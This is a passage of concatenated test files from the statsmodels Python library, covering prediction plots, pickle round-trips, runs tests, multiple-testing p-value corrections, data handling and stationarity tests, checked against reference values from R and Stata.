[(AutoReg, dict(lags=2, old_names=False)), (ARIMA, dict(order=(2, 0, 0)))],
)
@pytest.mark.parametrize("use_pandas", [True, False])
@pytest.mark.parametrize("alpha", [None, 0.10])
def test_predict_plot(use_pandas, model_and_args, alpha):
model, kwargs = model_and_args
rs = np.random.RandomState(0)
y = rs.standard_normal(1000)
for i in range(2, 1000):
y[i] += 1.8 * y[i - 1] - 0.9 * y[i - 2]
y = y[100:]
if use_pandas:
index = pd.date_range("1960-1-1", freq="M", periods=y.shape[0] + 24)
start = index[index.shape[0] // 2]
end = index[-1]
y = pd.Series(y, index=index[:-24])
else:
start = y.shape[0] // 2
end = y.shape[0] + 24
res = model(y, **kwargs).fit()
fig = plot_predict(res, start, end, alpha=alpha)
assert isinstance(fig, plt.Figure)
```
#### File: iolib/tests/test_pickle.py
```python
from statsmodels.compat.python import lrange
from io import BytesIO
import os
import pathlib
import tempfile
from numpy.testing import assert_equal
from statsmodels.iolib.smpickle import load_pickle, save_pickle
def test_pickle():
tmpdir = tempfile.mkdtemp(prefix="pickle")
a = lrange(10)
# test with str
path_str = tmpdir + "/res.pkl"
save_pickle(a, path_str)
b = load_pickle(path_str)
assert_equal(a, b)
# test with pathlib
path_pathlib = pathlib.Path(tmpdir) / "res2.pkl"
save_pickle(a, path_pathlib)
c = load_pickle(path_pathlib)
assert_equal(a, c)
# cleanup, tested on Windows
try:
os.remove(path_str)
os.remove(path_pathlib)
os.rmdir(tmpdir)
except (OSError, IOError):
pass
assert not os.path.exists(tmpdir)
# test with file handle
fh = BytesIO()
save_pickle(a, fh)
fh.seek(0, 0)
d = load_pickle(fh)
fh.close()
assert_equal(a, d)
def test_pickle_supports_open():
tmpdir = tempfile.mkdtemp(prefix="pickle")
a = lrange(10)
class SubPath:
def __init__(self, path):
self._path = pathlib.Path(path)
def open(
self,
mode="r",
buffering=-1,
encoding=None,
errors=None,
newline=None,
):
return self._path.open(
mode=mode,
buffering=buffering,
encoding=encoding,
errors=errors,
newline=newline,
)
# test with pathlib
path_pathlib = SubPath(tmpdir + os.pathsep + "res2.pkl")
save_pickle(a, path_pathlib)
c = load_pickle(path_pathlib)
assert_equal(a, c)
```
#### File: stats/tests/test_runs.py
```python
from numpy.testing import assert_almost_equal
from statsmodels.sandbox.stats.runs import runstest_1samp
def test_mean_cutoff():
x = [1] * 5 + [2] * 6 + [3] * 8
cutoff = "mean"
expected = (-4.007095978613213, 6.146988816717466e-05)
results = runstest_1samp(x, cutoff=cutoff, correction=False)
assert_almost_equal(expected, results)
def test_median_cutoff():
x = [1] * 5 + [2] * 6 + [3] * 8
cutoff = "median"
expected = (-3.944254410803499, 8.004864125547193e-05)
results = runstest_1samp(x, cutoff=cutoff, correction=False)
assert_almost_equal(expected, results)
def test_numeric_cutoff():
x = [1] * 5 + [2] * 6 + [3] * 8
cutoff = 2
expected = (-3.944254410803499, 8.004864125547193e-05)
results = runstest_1samp(x, cutoff=cutoff, correction=False)
assert_almost_equal(expected, results)
```
#### File: stats/tests/test_multi.py
```python
import pytest
import numpy as np
from numpy.testing import (assert_almost_equal, assert_equal,
assert_allclose)
from statsmodels.stats.multitest import (multipletests, fdrcorrection,
fdrcorrection_twostage,
NullDistribution,
local_fdr, multitest_methods_names)
from statsmodels.stats.multicomp import tukeyhsd
from scipy.stats.distributions import norm
pval0 = np.array([
0.838541367553, 0.642193923795, 0.680845947633,
0.967833824309, 0.71626938238, 0.177096952723, 5.23656777208e-005,
0.0202732688798, 0.00028140506198, 0.0149877310796])
res_multtest1 = np.array([
[5.2365677720800003e-05, 5.2365677720800005e-04,
5.2365677720800005e-04, 5.2365677720800005e-04,
5.2353339704891422e-04, 5.2353339704891422e-04,
5.2365677720800005e-04, 1.5337740764175588e-03],
[2.8140506198000000e-04, 2.8140506197999998e-03,
2.5326455578199999e-03, 2.5326455578199999e-03,
2.8104897961789277e-03, 2.5297966317768816e-03,
1.4070253098999999e-03, 4.1211324652269442e-03],
[1.4987731079600001e-02, 1.4987731079600000e-01,
1.1990184863680001e-01, 1.1990184863680001e-01,
1.4016246580579017e-01, 1.1379719679449507e-01,
4.9959103598666670e-02, 1.4632862843720582e-01],
[2.0273268879800001e-02, 2.0273268879799999e-01,
1.4191288215860001e-01, 1.4191288215860001e-01,
1.8520270949069695e-01, 1.3356756197485375e-01,
5.0683172199499998e-02, 1.4844940238274187e-01],
[1.7709695272300000e-01, 1.0000000000000000e+00,
1.0000000000000000e+00, 9.6783382430900000e-01,
8.5760763426056130e-01, 6.8947825122356643e-01,
3.5419390544599999e-01, 1.0000000000000000e+00],
[6.4219392379499995e-01, 1.0000000000000000e+00,
1.0000000000000000e+00, 9.6783382430900000e-01,
9.9996560644133570e-01, 9.9413539782557070e-01,
8.9533672797500008e-01, 1.0000000000000000e+00],
[6.8084594763299999e-01, 1.0000000000000000e+00,
1.0000000000000000e+00, 9.6783382430900000e-01,
9.9998903512635740e-01, 9.9413539782557070e-01,
8.9533672797500008e-01, 1.0000000000000000e+00],
[7.1626938238000004e-01, 1.0000000000000000e+00,
1.0000000000000000e+00, 9.6783382430900000e-01,
9.9999661886871472e-01, 9.9413539782557070e-01,
8.9533672797500008e-01, 1.0000000000000000e+00],
[8.3854136755300002e-01, 1.0000000000000000e+00,
1.0000000000000000e+00, 9.6783382430900000e-01,
9.9999998796038225e-01, 9.9413539782557070e-01,
9.3171263061444454e-01, 1.0000000000000000e+00],
[9.6783382430900000e-01, 1.0000000000000000e+00,
1.0000000000000000e+00, 9.6783382430900000e-01,
9.9999999999999878e-01, 9.9413539782557070e-01,
9.6783382430900000e-01, 1.0000000000000000e+00]])
res_multtest2_columns = [
'rawp', 'Bonferroni', 'Holm', 'Hochberg', 'SidakSS', 'SidakSD',
'BH', 'BY', 'ABH', 'TSBH_0.05']
rmethods = {
'rawp': (0, 'pval'),
'Bonferroni': (1, 'b'),
'Holm': (2, 'h'),
'Hochberg': (3, 'sh'),
'SidakSS': (4, 's'),
'SidakSD': (5, 'hs'),
'BH': (6, 'fdr_i'),
'BY': (7, 'fdr_n'),
'TSBH_0.05': (9, 'fdr_tsbh')
}
NA = np.nan
# all rejections, except for Bonferroni and Sidak
res_multtest2 = np.array([
0.002, 0.004, 0.006, 0.008, 0.01, 0.012, 0.012, 0.024, 0.036, 0.048,
0.06, 0.072, 0.012, 0.02, 0.024, 0.024, 0.024, 0.024, 0.012, 0.012,
0.012, 0.012, 0.012, 0.012, 0.01194015976019192, 0.02376127616613988,
0.03546430060660932, 0.04705017875634587, 0.058519850599,
0.06987425045000606, 0.01194015976019192, 0.01984063872102404,
0.02378486270400004, 0.023808512, 0.023808512, 0.023808512, 0.012,
0.012, 0.012, 0.012, 0.012, 0.012, 0.0294, 0.0294, 0.0294, 0.0294,
0.0294, 0.0294, NA, NA, NA, NA, NA, NA, 0, 0, 0, 0, 0, 0
]).reshape(6, 10, order='F')
res_multtest3 = np.array([
0.001, 0.002, 0.003, 0.004, 0.005, 0.05, 0.06, 0.07, 0.08, 0.09, 0.01,
0.02, 0.03, 0.04, 0.05, 0.5, 0.6, 0.7, 0.8, 0.9, 0.01, 0.018, 0.024,
0.028, 0.03, 0.25, 0.25, 0.25, 0.25, 0.25, 0.01, 0.018, 0.024, 0.028,
0.03, 0.09, 0.09, 0.09, 0.09, 0.09, 0.00995511979025177,
0.01982095664805061, 0.02959822305108317, 0.03928762649718986,
0.04888986953422814, 0.4012630607616213, 0.4613848859051006,
0.5160176928207072, 0.5656115457763677, 0.6105838818818925,
0.00995511979025177, 0.0178566699880266, 0.02374950634358763,
0.02766623106147537, 0.02962749064373438, 0.2262190625000001,
0.2262190625000001, 0.2262190625000001, 0.2262190625000001,
0.2262190625000001, 0.01, 0.01, 0.01, 0.01, 0.01, 0.08333333333333334,
0.0857142857142857, 0.0875, 0.0888888888888889, 0.09,
0.02928968253968254, 0.02928968253968254, 0.02928968253968254,
0.02928968253968254, 0.02928968253968254, 0.2440806878306878,
0.2510544217687075, 0.2562847222222222, 0.2603527336860670,
0.2636071428571428, NA, NA, NA, NA, NA, NA, NA, NA, NA, NA, 0.005,
0.005, 0.005, 0.005, 0.005, 0.04166666666666667, 0.04285714285714286,
0.04375, 0.04444444444444445, 0.045
]).reshape(10, 10, order='F')
res0_large = np.array([
0.00031612, 0.0003965, 0.00048442, 0.00051932, 0.00101436, 0.00121506,
0.0014516, 0.00265684, 0.00430043, 0.01743686, 0.02080285, 0.02785414,
0.0327198, 0.03494679, 0.04206808, 0.08067095, 0.23882767, 0.28352304,
0.36140401, 0.43565145, 0.44866768, 0.45368782, 0.48282088,
0.49223781, 0.55451638, 0.6207473, 0.71847853, 0.72424145, 0.85950263,
0.89032747, 0.0094836, 0.011895, 0.0145326, 0.0155796, 0.0304308,
0.0364518, 0.043548, 0.0797052, 0.1290129, 0.5231058, 0.6240855,
0.8356242, 0.981594, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1,
1, 0.0094836, 0.0114985, 0.01356376, 0.01402164, 0.02637336,
0.0303765, 0.0348384, 0.06110732, 0.09460946, 0.36617406, 0.416057,
0.52922866, 0.5889564, 0.59409543, 0.67308928, 1, 1, 1, 1, 1, 1, 1, 1,
1, 1, 1, 1, 1, 1, 1, 0.0094836, 0.0114985, 0.01356376, 0.01402164,
0.02637336, 0.0303765, 0.0348384, 0.06110732, 0.09460946, 0.36617406,
0.416057, 0.52922866, 0.5889564, 0.59409543, 0.67308928, 0.89032747,
0.89032747, 0.89032747, 0.89032747, 0.89032747, 0.89032747,
0.89032747, 0.89032747, 0.89032747, 0.89032747, 0.89032747,
0.89032747, 0.89032747, 0.89032747, 0.89032747, 0.009440257627368331,
0.01182686507401931, 0.01443098172617119, 0.01546285007478554,
0.02998742566629453, 0.03581680249125385, 0.04264369065603335,
0.0767094173291795, 0.1212818694859857, 0.410051586220387,
0.4677640287633493, 0.5715077903157826, 0.631388450393325,
0.656016359012282, 0.724552174001554, 0.919808283456286,
0.999721715014484, 0.9999547032674126, 0.9999985652190126,
0.999999964809746, 0.999999982525548, 0.999999986719131,
0.999999997434160, 0.999999998521536, 0.999999999970829,
0.999999999999767, 1, 1, 1, 1, 0.009440257627368331,
0.01143489901147732, 0.0134754287611275, 0.01392738605848343,
0.0260416568490015, 0.02993768724817902, 0.0342629726119179,
0.0593542206208364, 0.09045742964699988, 0.308853956167216,
0.343245865702423, 0.4153483370083637, 0.4505333180190900,
0.453775200643535, 0.497247406680671, 0.71681858015803,
0.978083969553718, 0.986889206426321, 0.995400461639735,
0.9981506396214986, 0.9981506396214986, 0.9981506396214986,
0.9981506396214986, 0.9981506396214986, 0.9981506396214986,
0.9981506396214986, 0.9981506396214986, 0.9981506396214986,
0.9981506396214986, 0.9981506396214986, 0.0038949, 0.0038949,
0.0038949, 0.0038949, 0.0060753, 0.0060753, 0.006221142857142857,
0.00996315, 0.01433476666666667, 0.05231058, 0.05673504545454545,
0.06963535, 0.07488597857142856, 0.07488597857142856, 0.08413616,
0.15125803125, 0.421460594117647, 0.4725384, 0.570637910526316,
0.6152972625, 0.6152972625, 0.6152972625, 0.6152972625, 0.6152972625,
0.665419656, 0.7162468846153845, 0.775972982142857, 0.775972982142857,
0.889140651724138, 0.89032747, 0.01556007537622183,
0.01556007537622183, 0.01556007537622183, 0.01556007537622183,
0.02427074531648065, 0.02427074531648065, 0.02485338565390302,
0.0398026560334295, 0.0572672083580799, 0.2089800939109816,
0.2266557764630925, 0.2781923271071372, 0.2991685206792373,
0.2991685206792373, 0.336122876445059, 0.6042738882921044, 1, 1, 1, 1,
1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 0.00220711, 0.00220711, 0.00220711,
0.00220711, 0.00344267, 0.00344267, 0.003525314285714285, 0.005645785,
0.00812303444444444, 0.029642662, 0.0321498590909091,
0.03946003166666667, 0.04243538785714285, 0.04243538785714285,
0.0476771573333333, 0.085712884375, 0.23882767, 0.26777176,
0.323361482631579, 0.34866844875, 0.34866844875, 0.34866844875,
0.34866844875, 0.34866844875, 0.3770711384, 0.4058732346153846,
0.4397180232142857, 0.4397180232142857, 0.503846369310345,
0.504518899666667, 0.00272643, 0.00272643, 0.00272643, 0.00272643,
0.00425271, 0.00425271, 0.0043548, 0.006974205, 0.01003433666666667,
0.036617406, 0.03971453181818182, 0.048744745, 0.052420185,
0.052420185, 0.058895312, 0.105880621875, 0.295022415882353,
0.33077688, 0.399446537368421, 0.43070808375, 0.43070808375,
0.43070808375, 0.43070808375, 0.43070808375, 0.4657937592,
0.5013728192307692, 0.5431810875, 0.5431810875, 0.622398456206897,
0.623229229
]).reshape(30, 10, order='F')
class CheckMultiTestsMixin(object):
@pytest.mark.parametrize('key,val', sorted(rmethods.items()))
def test_multi_pvalcorrection_rmethods(self, key, val):
# test against R package multtest mt.rawp2adjp
res_multtest = self.res2
pval0 = res_multtest[:, 0]
if val[1] in self.methods:
reject, pvalscorr = multipletests(pval0,
alpha=self.alpha,
method=val[1])[:2]
assert_almost_equal(pvalscorr, res_multtest[:, val[0]], 15)
assert_equal(reject, pvalscorr <= self.alpha)
def test_multi_pvalcorrection(self):
# test against R package multtest mt.rawp2adjp
res_multtest = self.res2
pval0 = res_multtest[:, 0]
pvalscorr = np.sort(fdrcorrection(pval0, method='n')[1])
assert_almost_equal(pvalscorr, res_multtest[:, 7], 15)
pvalscorr = np.sort(fdrcorrection(pval0, method='i')[1])
assert_almost_equal(pvalscorr, res_multtest[:, 6], 15)
class TestMultiTests1(CheckMultiTestsMixin):
@classmethod
def setup_class(cls):
cls.methods = ['b', 's', 'sh', 'hs', 'h', 'fdr_i', 'fdr_n']
cls.alpha = 0.1
cls.res2 = res_multtest1
class TestMultiTests2(CheckMultiTestsMixin):
# case: all hypothesis rejected (except 'b' and 's'
@classmethod
def setup_class(cls):
cls.methods = ['b', 's', 'sh', 'hs', 'h', 'fdr_i', 'fdr_n']
cls.alpha = 0.05
cls.res2 = res_multtest2
class TestMultiTests3(CheckMultiTestsMixin):
@classmethod
def setup_class(cls):
cls.methods = ['b', 's', 'sh', 'hs', 'h', 'fdr_i', 'fdr_n',
'fdr_tsbh']
cls.alpha = 0.05
cls.res2 = res0_large
class TestMultiTests4(CheckMultiTestsMixin):
# in simulations, all two stage fdr, fdr_tsbky, fdr_tsbh, fdr_gbs, have in
# some cases (cases with large Alternative) an FDR that looks too large
# this is the first case #rejected = 12, DGP : has 10 false
@classmethod
def setup_class(cls):
cls.methods = ['b', 's', 'sh', 'hs', 'h', 'fdr_i', 'fdr_n',
'fdr_tsbh']
cls.alpha = 0.05
cls.res2 = res_multtest3
@pytest.mark.parametrize('alpha', [0.01, 0.05, 0.1])
@pytest.mark.parametrize('method', ['b', 's', 'sh', 'hs', 'h', 'hommel',
'fdr_i', 'fdr_n', 'fdr_tsbky',
'fdr_tsbh', 'fdr_gbs'])
@pytest.mark.parametrize('ii', list(range(11)))
def test_pvalcorrection_reject(alpha, method, ii):
# consistency test for reject boolean and pvalscorr
pval1 = np.hstack((np.linspace(0.0001, 0.0100, ii),
np.linspace(0.05001, 0.11, 10 - ii)))
# using .05001 instead of 0.05 to avoid edge case issue #768
reject, pvalscorr = multipletests(pval1, alpha=alpha,
method=method)[:2]
msg = 'case %s %3.2f rejected:%d\npval_raw=%r\npvalscorr=%r' % (
method, alpha, reject.sum(), pval1, pvalscorr)
assert_equal(reject, pvalscorr <= alpha, err_msg=msg)
def test_hommel():
# tested against R stats p_adjust(pval0, method='hommel')
pval0 = np.array([
0.00116, 0.00924, 0.01075, 0.01437, 0.01784, 0.01918,
0.02751, 0.02871, 0.03054, 0.03246, 0.04259, 0.06879,
0.0691, 0.08081, 0.08593, 0.08993, 0.09386, 0.09412,
0.09718, 0.09758, 0.09781, 0.09788, 0.13282, 0.20191,
0.21757, 0.24031, 0.26061, 0.26762, 0.29474, 0.32901,
0.41386, 0.51479, 0.52461, 0.53389, 0.56276, 0.62967,
0.72178, 0.73403, 0.87182, 0.95384])
result_ho = np.array([
0.0464, 0.25872, 0.29025,
0.3495714285714286, 0.41032, 0.44114,
0.57771, 0.60291, 0.618954,
0.6492, 0.7402725000000001, 0.86749,
0.86749, 0.8889100000000001, 0.8971477777777778,
0.8993, 0.9175374999999999, 0.9175374999999999,
0.9175374999999999, 0.9175374999999999, 0.9175374999999999,
0.9175374999999999, 0.95384, 0.9538400000000001,
0.9538400000000001, 0.9538400000000001, 0.9538400000000001,
0.9538400000000001, 0.9538400000000001, 0.9538400000000001,
0.9538400000000001, 0.9538400000000001, 0.9538400000000001,
0.9538400000000001, 0.9538400000000001, 0.9538400000000001,
0.9538400000000001, 0.9538400000000001, 0.9538400000000001,
0.9538400000000001])
rej, pvalscorr, _, _ = multipletests(pval0, alpha=0.1, method='ho')
assert_almost_equal(pvalscorr, result_ho, 15)
assert_equal(rej, result_ho < 0.1)
def test_fdr_bky():
# test for fdrcorrection_twostage
# example from BKY
pvals = [
0.0001, 0.0004, 0.0019, 0.0095, 0.0201, 0.0278, 0.0298, 0.0344, 0.0459,
0.3240, 0.4262, 0.5719, 0.6528, 0.7590, 1.000]
# no test for corrected p-values, but they are inherited
# same number of rejection as in BKY paper:
# single step-up:4, two-stage:8, iterated two-step:9
# also alpha_star is the same as theirs for TST
# alpha_star for stage 2
res_tst = fdrcorrection_twostage(pvals, alpha=0.05, iter=False)
assert_almost_equal([0.047619, 0.0649], res_tst[-1][:2], 3)
assert_equal(8, res_tst[0].sum())
@pytest.mark.parametrize('method', sorted(multitest_methods_names))
def test_issorted(method):
# test that is_sorted keyword works correctly
# the fdrcorrection functions are tested indirectly
# data generated as random numbers np.random.beta(0.2, 0.5, size=10)
pvals = np.array([31, 9958111, 7430818, 8653643, 9892855, 876, 2651691,
145836, 9931, 6174747]) * 1e-7
sortind = np.argsort(pvals)
sortrevind = sortind.argsort()
pvals_sorted = pvals[sortind]
res1 = multipletests(pvals, method=method, is_sorted=False)
res2 = multipletests(pvals_sorted, method=method, is_sorted=True)
assert_equal(res2[0][sortrevind], res1[0])
assert_allclose(res2[0][sortrevind], res1[0], rtol=1e-10)
@pytest.mark.parametrize('method', sorted(multitest_methods_names))
def test_floating_precision(method):
# issue #7465
pvals = np.full(6000, 0.99)
pvals[0] = 1.138569e-56
assert multipletests(pvals, method=method)[1][0] > 1e-60
def test_tukeyhsd():
# example multicomp in R p 83
res = '''\
pair diff lwr upr p adj
P-M 8.150000 -10.037586 26.3375861 0.670063958
S-M -3.258333 -21.445919 14.9292527 0.982419709
T-M 23.808333 5.620747 41.9959194 0.006783701
V-M 4.791667 -13.395919 22.9792527 0.931020848
S-P -11.408333 -29.595919 6.7792527 0.360680099
T-P 15.658333 -2.529253 33.8459194 0.113221634
V-P -3.358333 -21.545919 14.8292527 0.980350080
T-S 27.066667 8.879081 45.2542527 0.002027122
V-S 8.050000 -10.137586 26.2375861 0.679824487
V-T -19.016667 -37.204253 -0.8290806 0.037710044
'''
res = np.array([
[8.150000, -10.037586, 26.3375861, 0.670063958],
[-3.258333, -21.445919, 14.9292527, 0.982419709],
[23.808333, 5.620747, 41.9959194, 0.006783701],
[4.791667, -13.395919, 22.9792527, 0.931020848],
[-11.408333, -29.595919, 6.7792527, 0.360680099],
[15.658333, -2.529253, 33.8459194, 0.113221634],
[-3.358333, -21.545919, 14.8292527, 0.980350080],
[27.066667, 8.879081, 45.2542527, 0.002027122],
[8.050000, -10.137586, 26.2375861, 0.679824487],
[-19.016667, -37.204253, -0.8290806, 0.037710044]])
m_r = [94.39167, 102.54167, 91.13333, 118.20000, 99.18333]
myres = tukeyhsd(m_r, 6, 110.8, alpha=0.05, df=4)
pairs, reject, meandiffs, std_pairs, confint, q_crit = myres[:6]
assert_almost_equal(meandiffs, res[:, 0], decimal=5)
assert_almost_equal(confint, res[:, 1:3], decimal=2)
assert_equal(reject, res[:, 3] < 0.05)
# check p-values (divergence of high values is expected)
small_pvals_idx = [2, 5, 7, 9]
assert_allclose(myres[8][small_pvals_idx], res[small_pvals_idx, 3],
rtol=1e-3)
def test_local_fdr():
# Create a mixed population of Z-scores: 1000 standard normal and
# 20 uniformly distributed between 3 and 4.
grid = np.linspace(0.001, 0.999, 1000)
z0 = norm.ppf(grid)
z1 = np.linspace(3, 4, 20)
zs = np.concatenate((z0, z1))
# Exact local FDR for U(3, 4) component.
f1 = np.exp(-z1**2 / 2) / np.sqrt(2*np.pi)
r = len(z1) / float(len(z0) + len(z1))
f1 /= (1 - r) * f1 + r
for alpha in None, 0, 1e-8:
if alpha is None:
fdr = local_fdr(zs)
else:
fdr = local_fdr(zs, alpha=alpha)
fdr1 = fdr[len(z0):]
assert_allclose(f1, fdr1, rtol=0.05, atol=0.1)
def test_null_distribution():
# Create a mixed population of Z-scores: 1000 standard normal and
# 20 uniformly distributed between 3 and 4.
grid = np.linspace(0.001, 0.999, 1000)
z0 = norm.ppf(grid)
z1 = np.linspace(3, 4, 20)
zs = np.concatenate((z0, z1))
emp_null = NullDistribution(zs, estimate_null_proportion=True)
assert_allclose(emp_null.mean, 0, atol=1e-5, rtol=1e-5)
assert_allclose(emp_null.sd, 1, atol=1e-5, rtol=1e-2)
assert_allclose(emp_null.null_proportion, 0.98, atol=1e-5, rtol=1e-2)
# consistency check
assert_allclose(emp_null.pdf(np.r_[-1, 0, 1]),
norm.pdf(np.r_[-1, 0, 1],
loc=emp_null.mean, scale=emp_null.sd),
rtol=1e-13)
@pytest.mark.parametrize('estimate_prob', [True, False])
@pytest.mark.parametrize('estimate_scale', [True, False])
@pytest.mark.parametrize('estimate_mean', [True, False])
def test_null_constrained(estimate_mean, estimate_scale, estimate_prob):
# Create a mixed population of Z-scores: 1000 standard normal and
# 20 uniformly distributed between 3 and 4.
grid = np.linspace(0.001, 0.999, 1000)
z0 = norm.ppf(grid)
z1 = np.linspace(3, 4, 20)
zs = np.concatenate((z0, z1))
emp_null = NullDistribution(zs, estimate_mean=estimate_mean,
estimate_scale=estimate_scale,
estimate_null_proportion=estimate_prob)
if not estimate_mean:
assert_allclose(emp_null.mean, 0, atol=1e-5, rtol=1e-5)
if not estimate_scale:
assert_allclose(emp_null.sd, 1, atol=1e-5, rtol=1e-2)
if not estimate_prob:
assert_allclose(emp_null.null_proportion, 1, atol=1e-5, rtol=1e-2)
# consistency check
assert_allclose(emp_null.pdf(np.r_[-1, 0, 1]),
norm.pdf(np.r_[-1, 0, 1], loc=emp_null.mean,
scale=emp_null.sd),
rtol=1e-13)
```
#### File: tools/tests/test_data.py
```python
import numpy as np
import pandas
from statsmodels.tools import data
def test_missing_data_pandas():
"""
Fixes GH: #144
"""
X = np.random.random((10, 5))
X[1, 2] = np.nan
df = pandas.DataFrame(X)
vals, cnames, rnames = data.interpret_data(df)
np.testing.assert_equal(rnames.tolist(), [0, 2, 3, 4, 5, 6, 7, 8, 9])
def test_dataframe():
X = np.random.random((10, 5))
df = pandas.DataFrame(X)
vals, cnames, rnames = data.interpret_data(df)
np.testing.assert_equal(vals, df.values)
np.testing.assert_equal(rnames.tolist(), df.index.tolist())
np.testing.assert_equal(cnames, df.columns.tolist())
def test_patsy_577():
X = np.random.random((10, 2))
df = pandas.DataFrame(X, columns=["var1", "var2"])
from patsy import dmatrix
endog = dmatrix("var1 - 1", df)
np.testing.assert_(data._is_using_patsy(endog, None))
exog = dmatrix("var2 - 1", df)
np.testing.assert_(data._is_using_patsy(endog, exog))
```
#### File: tsa/tests/test_stattools.py
```python
from statsmodels.compat.numpy import lstsq
from statsmodels.compat.pandas import assert_index_equal
from statsmodels.compat.platform import PLATFORM_WIN
from statsmodels.compat.python import lrange
import os
import warnings
import numpy as np
from numpy.testing import (
assert_,
assert_allclose,
assert_almost_equal,
assert_equal,
assert_raises,
)
import pandas as pd
from pandas import DataFrame, Series, date_range
import pytest
from scipy.interpolate import interp1d
from statsmodels.datasets import macrodata, modechoice, nile, randhie, sunspots
from statsmodels.tools.sm_exceptions import (
CollinearityWarning,
InfeasibleTestError,
InterpolationWarning,
MissingDataError,
)
# Remove imports when range unit root test gets an R implementation
from statsmodels.tools.validation import array_like, bool_like
from statsmodels.tsa.arima_process import arma_acovf
from statsmodels.tsa.statespace.sarimax import SARIMAX
from statsmodels.tsa.stattools import (
acf,
acovf,
adfuller,
arma_order_select_ic,
breakvar_heteroskedasticity_test,
ccovf,
coint,
grangercausalitytests,
innovations_algo,
innovations_filter,
kpss,
levinson_durbin,
levinson_durbin_pacf,
pacf,
pacf_burg,
pacf_ols,
pacf_yw,
range_unit_root_test,
zivot_andrews,
)
DECIMAL_8 = 8
DECIMAL_6 = 6
DECIMAL_5 = 5
DECIMAL_4 = 4
DECIMAL_3 = 3
DECIMAL_2 = 2
DECIMAL_1 = 1
CURR_DIR = os.path.dirname(os.path.abspath(__file__))
@pytest.fixture(scope="module")
def acovf_data():
rnd = np.random.RandomState(12345)
return rnd.randn(250)
class CheckADF(object):
"""
Test Augmented Dickey-Fuller
Test values taken from Stata.
"""
levels = ["1%", "5%", "10%"]
data = macrodata.load_pandas()
x = data.data["realgdp"].values
y = data.data["infl"].values
def test_teststat(self):
assert_almost_equal(self.res1[0], self.teststat, DECIMAL_5)
def test_pvalue(self):
assert_almost_equal(self.res1[1], self.pvalue, DECIMAL_5)
def test_critvalues(self):
critvalues = [self.res1[4][lev] for lev in self.levels]
assert_almost_equal(critvalues, self.critvalues, DECIMAL_2)
class TestADFConstant(CheckADF):
"""
Dickey-Fuller test for unit root
"""
@classmethod
def setup_class(cls):
cls.res1 = adfuller(cls.x, regression="c", autolag=None, maxlag=4)
cls.teststat = 0.97505319
cls.pvalue = 0.99399563
cls.critvalues = [-3.476, -2.883, -2.573]
class TestADFConstantTrend(CheckADF):
""""""
@classmethod
def setup_class(cls):
cls.res1 = adfuller(cls.x, regression="ct", autolag=None, maxlag=4)
cls.teststat = -1.8566374
cls.pvalue = 0.67682968
cls.critvalues = [-4.007, -3.437, -3.137]
# FIXME: do not leave commented-out
# class TestADFConstantTrendSquared(CheckADF):
# """
# """
# pass
# TODO: get test values from R?
class TestADFNoConstant(CheckADF):
""""""
@classmethod
def setup_class(cls):
with pytest.warns(FutureWarning):
adfuller(cls.x, regression="nc", autolag=None, maxlag=4)
cls.res1 = adfuller(cls.x, regression="n", autolag=None, maxlag=4)
cls.teststat = 3.5227498
cls.pvalue = 0.99999
# Stata does not return a p-value for noconstant.
# Tau^max in MacKinnon (1994) is missing, so it is
# assumed that its right-tail is well-behaved
cls.critvalues = [-2.587, -1.950, -1.617]
# No Unit Root
class TestADFConstant2(CheckADF):
@classmethod
def setup_class(cls):
cls.res1 = adfuller(cls.y, regression="c", autolag=None, maxlag=1)
cls.teststat = -4.3346988
cls.pvalue = 0.00038661
cls.critvalues = [-3.476, -2.883, -2.573]
class TestADFConstantTrend2(CheckADF):
@classmethod
def setup_class(cls):
cls.res1 = adfuller(cls.y, regression="ct", autolag=None, maxlag=1)
cls.teststat = -4.425093
cls.pvalue = 0.00199633
cls.critvalues = [-4.006, -3.437, -3.137]
class TestADFNoConstant2(CheckADF):
@classmethod
def setup_class(cls):
cls.res1 = adfuller(cls.y, regression="n", autolag=None, maxlag=1)
cls.teststat = -2.4511596
cls.pvalue = 0.013747
# Stata does not return a p-value for noconstant
# this value is just taken from our results
cls.critvalues = [-2.587, -1.950, -1.617]
_, _1, _2, cls.store = adfuller(
cls.y, regression="n", autolag=None, maxlag=1, store=True
)
def test_store_str(self):
assert_equal(
self.store.__str__(), "Augmented Dickey-Fuller Test Results"
)
class CheckCorrGram(object):
"""
Set up for ACF, PACF tests.
"""
data = macrodata.load_pandas()
x = data.data["realgdp"]
filename = os.path.join(CURR_DIR, "results", "results_corrgram.csv")
results = pd.read_csv(filename, delimiter=",")
class TestACF(CheckCorrGram):
"""
Test Autocorrelation Function
"""
@classmethod
def setup_class(cls):
cls.acf = cls.results["acvar"]
# cls.acf = np.concatenate(([1.], cls.acf))
cls.qstat = cls.results["Q1"]
cls.res1 = acf(cls.x, nlags=40, qstat=True, alpha=0.05, fft=False)
cls.confint_res = cls.results[["acvar_lb", "acvar_ub"]].values
def test_acf(self):
assert_almost_equal(self.res1[0][1:41], self.acf, DECIMAL_8)
def test_confint(self):
centered = self.res1[1] - self.res1[1].mean(1)[:, None]
assert_almost_equal(centered[1:41], self.confint_res, DECIMAL_8)
def test_qstat(self):
assert_almost_equal(self.res1[2][:40], self.qstat, DECIMAL_3)
# 3 decimal places because of stata rounding
# FIXME: enable/xfail/skip or delete
# def pvalue(self):
# pass
# NOTE: should not need testing if Q stat is correct
class TestACF_FFT(CheckCorrGram):
# Test Autocorrelation Function using FFT
@classmethod
def setup_class(cls):
cls.acf = cls.results["acvarfft"]
cls.qstat = cls.results["Q1"]
cls.res1 = acf(cls.x, nlags=40, qstat=True, fft=True)
def test_acf(self):
assert_almost_equal(self.res1[0][1:], self.acf, DECIMAL_8)
def test_qstat(self):
# todo why is res1/qstat 1 short
assert_almost_equal(self.res1[1], self.qstat, DECIMAL_3)
class TestACFMissing(CheckCorrGram):
# Test Autocorrelation Function using Missing
@classmethod
def setup_class(cls):
cls.x = np.concatenate((np.array([np.nan]), cls.x))
cls.acf = cls.results["acvar"] # drop and conservative
cls.qstat = cls.results["Q1"]
cls.res_drop = acf(
cls.x, nlags=40, qstat=True, alpha=0.05, missing="drop", fft=False
)
cls.res_conservative = acf(
cls.x,
nlags=40,
qstat=True,
alpha=0.05,
fft=False,
missing="conservative",
)
cls.acf_none = np.empty(40) * np.nan # lags 1 to 40 inclusive
cls.qstat_none = np.empty(40) * np.nan
cls.res_none = acf(
cls.x, nlags=40, qstat=True, alpha=0.05, missing="none", fft=False
)
def test_raise(self):
with pytest.raises(MissingDataError):
acf(
self.x,
nlags=40,
